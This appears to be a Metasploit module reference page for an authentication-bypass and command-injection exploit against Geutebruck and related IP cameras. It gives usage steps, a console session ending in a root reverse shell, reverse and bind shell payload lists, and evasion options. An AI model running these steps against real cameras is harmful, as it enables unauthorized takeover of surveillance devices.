Geutebruck Multiple Remote Command Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Geutebruck Multiple Remote Command Execution
Module: exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx
Source code: modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb
Disclosure date: 2021-07-08
Last modification time: 2022-10-01 17:54:59 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-33543, CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554

This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx
msf exploit(geutebruck_cmdinject_cve_2021_335xx) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


The following Geutebruck products using firmware versions <= 1.12.0.27, firmware version 1.12.13.2 or firmware version 1.12.14.5:

  • Encoder and E2 Series Camera models:
    • G-Code:
    • EEC-2xxx
    • G-Cam:
    • EBC-21xx
    • EFD-22xx
    • ETHC-22xx
    • EWPC-22xx

Many brands use the same firmware:

  • UDP Technology (which is also the supplier of the firmware for the other vendors)
  • Ganz
  • Visualint
  • Cap
  • THRIVE Intelligence
  • Sophus
  • VCA
  • TripCorps
  • Sprinx Technologies
  • Smartec
  • Riva

This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running the latest firmware version 1.12.0.27.

Description

This module bypasses authentication and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.

Users can find additional details of this vulnerability on the blogpost page at https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.

Verification Steps


  1. Start the camera using default configuration
  2. Launch msfconsole
  3. Do: use exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx
  4. Do: set lhost <metasploit_ip>
  5. Do: set rhosts <camera_ip>
  6. Do: check to be sure the target is vulnerable
  7. Do: exploit
  8. You should get a shell as the root user.

Scenarios


Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.0.27.

msf6 > use exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > exploit
[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Setting up request...
[*] Sending CMD injection request to 192.168.14.58:80
[*] Exploit complete, you should get a shell as the root user!
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2021-02-23 13:37:28 +0200
pwd
/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-g3532e87a #1 PREEMPT Tue May 12 18:00:46 KST 2020 armv5tejl GNU/Linux

Go back to menu.

Msfconsole Usage


Here is how the linux/http/geutebruck_cmdinject_cve_2021_335xx exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx

[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > show info

       Name: Geutebruck Multiple Remote Command Execution
     Module: exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx
   Platform: Unix, Linux
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-07-08

Provided by:
  Titouan Lazard
  Ibrahim Ayadhi
  S��bastien Charbonnier

Module side effects:
 ARTIFACTS_ON_DISK

Module stability:
 CRASH_SAFE

Module reliability:
 REPEATABLE_SESSION

Available targets:
  Id  Name
  --  ----
  0   CVE-2021-33544 - certmngr.cgi
  1   CVE-2021-33548 - factory.cgi
  2   CVE-2021-33550 - language.cgi
  3   CVE-2021-33551 - oem.cgi
  4   CVE-2021-33552 - simple_reclistjs.cgi
  5   CVE-2021-33553 - testcmd.cgi
  6   CVE-2021-33554 - tmpapp.cgi

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    80               yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to l
                                      isten on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  This module bypasses the HTTP basic authentication used to access 
  the /uapi-cgi/ folder and exploits multiple authenticated arbitrary 
  command execution vulnerabilities within the parameters of various 
  pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, 
  ETHC-22xx, and EWPC-22xx devices running firmware versions <= 
  1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. 
  Successful exploitation results in remote code execution as the root 
  user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-33543
  https://nvd.nist.gov/vuln/detail/CVE-2021-33544
  https://nvd.nist.gov/vuln/detail/CVE-2021-33548
  https://nvd.nist.gov/vuln/detail/CVE-2021-33550
  https://nvd.nist.gov/vuln/detail/CVE-2021-33551
  https://nvd.nist.gov/vuln/detail/CVE-2021-33552
  https://nvd.nist.gov/vuln/detail/CVE-2021-33553
  https://nvd.nist.gov/vuln/detail/CVE-2021-33554
  http://geutebruck.com
  https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
  https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03

Module Options


This is a complete list of options available in the linux/http/geutebruck_cmdinject_cve_2021_335xx exploit:

msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > show options

Module options (exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                       listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat_gaping):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   CVE-2021-33544 - certmngr.cgi

Advanced Options


Here is a complete list of advanced options supported by the linux/http/geutebruck_cmdinject_cve_2021_335xx exploit:

msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > show advanced

Module advanced options (exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx):

   Name                    Current Setting                          Required  Description
   ----                    ---------------                          --------  -----------
   AutoCheck               true                                     no        Run check before exploit
   CMDSTAGER::DECODER                                               no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                     no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write
                                                                              , echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwp
                                                                              request, psh_invokewebrequest)
   CMDSTAGER::SSL          false                                    no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                  no        Writable directory for staged files
   ContextInformationFile                                           no        The information file that contains context information
   DOMAIN                  WORKSTATION                              yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                     no        Conform to IIS, should work for most servers. Only set to false for no
                                                                              n-IIS servers
   DisablePayloadHandler   false                                    no        Disable the handler code for the selected payload
   EXE::Custom                                                      no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                    no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                    no        Use the default template in case the specified one is missing
   EXE::Inject             false                                    no        Set to preserve the original EXE function
   EXE::OldMethod          false                                    no        Set to use the substitution EXE generation method.
   EXE::Path                                                        no        The directory in which to look for the executable template
   EXE::Template                                                    no        The executable template file name.
   EnableContextEncoding   false                                    no        Use transient context when encoding payloads
   FingerprintCheck        true                                     no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                    no        Override check result
   HttpClientTimeout                                                no        HTTP connection and receive timeout
   HttpPassword                                                     no        The HTTP password to specify for authentication
   HttpRawHeaders                                                   no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                    no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                  no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                    no        Show HTTP headers only in HttpTrace
   HttpUsername                                                     no        The HTTP username to specify for authentication
   ListenerComm                                                     no        The specific communication channel to use for this service
   MSI::Custom                                                      no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                    no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                        no        The directory in which to look for the msi template
   MSI::Template                                                    no        The msi template file name
   MSI::UAC                false                                    no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                    no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                     yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are aut
                                                                              o-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                    no        Return a robots.txt file if asked for one
   URIHOST                                                          no        Host to use in URI (useful for tunnels)
   URIPORT                                                          no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Wind  no        The User-Agent header to use for all requests
                           ows NT 5.1)
   VERBOSE                 false                                    no        Enable detailed status messages
   WORKSPACE                                                        no        Specify the workspace for this module
   WfsDelay                2                                        no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat_gaping):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but
                                                          directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/geutebruck_cmdinject_cve_2021_335xx module can exploit:

msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   CVE-2021-33544 - certmngr.cgi
   1   CVE-2021-33548 - factory.cgi
   2   CVE-2021-33550 - language.cgi
   3   CVE-2021-33551 - oem.cgi
   4   CVE-2021-33552 - simple_reclistjs.cgi
   5   CVE-2021-33553 - testcmd.cgi
   6   CVE-2021-33554 - tmpapp.cgi

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/geutebruck_cmdinject_cve_2021_335xx exploit:

msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   21  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   22  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   23  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   24  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   25  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   26  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   27  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   28  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   29  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   30  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   31  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   32  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   33  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   34  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   35  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   36  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   37  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   38  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   39  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   40  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   41  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   42  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   43  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   44  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   45  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   46  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   47  payload/generic/custom                                       normal  No     Custom Payload
   48  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   49  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/geutebruck_cmdinject_cve_2021_335xx exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/geutebruck_cmdinject_cve_2021_335xx) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate
                                                            )
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache
                                                            )
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-n
                                                            ormal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed!


Here is a relevant code snippet related to the "Connection failed!" error message:

132:	    res = send_request_cgi(
133:	      'method' => 'GET',
134:	      'uri' => '/brand.xml'
135:	    )
136:	    unless res
137:	      print_error('Connection failed!')
138:	      return false
139:	    end
140:	
141:	    unless res&.body && !res.body.empty?
142:	      print_error('Empty body in the response!')

Empty body in the response!


Here is a relevant code snippet related to the "Empty body in the response!" error message:

137:	      print_error('Connection failed!')
138:	      return false
139:	    end
140:	
141:	    unless res&.body && !res.body.empty?
142:	      print_error('Empty body in the response!')
143:	      return false
144:	    end
145:	
146:	    res_xml = res.get_xml_document
147:	    if res_xml.at('//firmware').nil?

Target did not respond with a XML document containing the "firmware" element!


Here is a relevant code snippet related to the "Target did not respond with a XML document containing the "firmware" element!" error message:

143:	      return false
144:	    end
145:	
146:	    res_xml = res.get_xml_document
147:	    if res_xml.at('//firmware').nil?
148:	      print_error('Target did not respond with a XML document containing the "firmware" element!')
149:	      return false
150:	    end
151:	    raw_text = res_xml.at('//firmware').text
152:	    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
153:	      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]

Target responded with a XML document containing the "firmware" element but its not a valid version string!


Here is a relevant code snippet related to the "Target responded with a XML document containing the "firmware" element but its not a valid version string!" error message:

150:	    end
151:	    raw_text = res_xml.at('//firmware').text
152:	    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
153:	      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
154:	    else
155:	      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
156:	      false
157:	    end
158:	  end
159:	
160:	  def check

Target did not respond with a valid XML response that we could retrieve the version from!


Here is a relevant code snippet related to the "Target did not respond with a valid XML response that we could retrieve the version from!" error message:

158:	  end
159:	
160:	  def check
161:	    version = firmware
162:	    if version == false
163:	      return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
164:	    end
165:	
166:	    rex_version = Rex::Version.new(version)
167:	    vprint_status("Found Geutebruck version #{rex_version}")
168:	    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Titouan Lazard
  • Ibrahim Ayadhi
  • Sébastien Charbonnier

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.